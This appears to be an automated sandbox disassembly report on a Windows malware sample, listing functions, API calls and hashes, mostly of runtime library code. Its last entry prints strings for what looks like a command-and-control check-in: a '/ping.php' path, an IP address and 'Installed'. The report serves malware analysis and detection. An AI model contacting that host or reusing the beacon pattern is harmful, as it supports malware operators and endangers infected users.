                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AA79 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004145CC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B429 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                  • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E533 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                  • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EE9E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2895899722
                                                                                                                                                                                                                                  • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041D851 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                    • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                    • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                    • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                  • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-1863747741
                                                                                                                                                                                                                                  • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040356F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                  • API String ID: 3519838083-3380671521
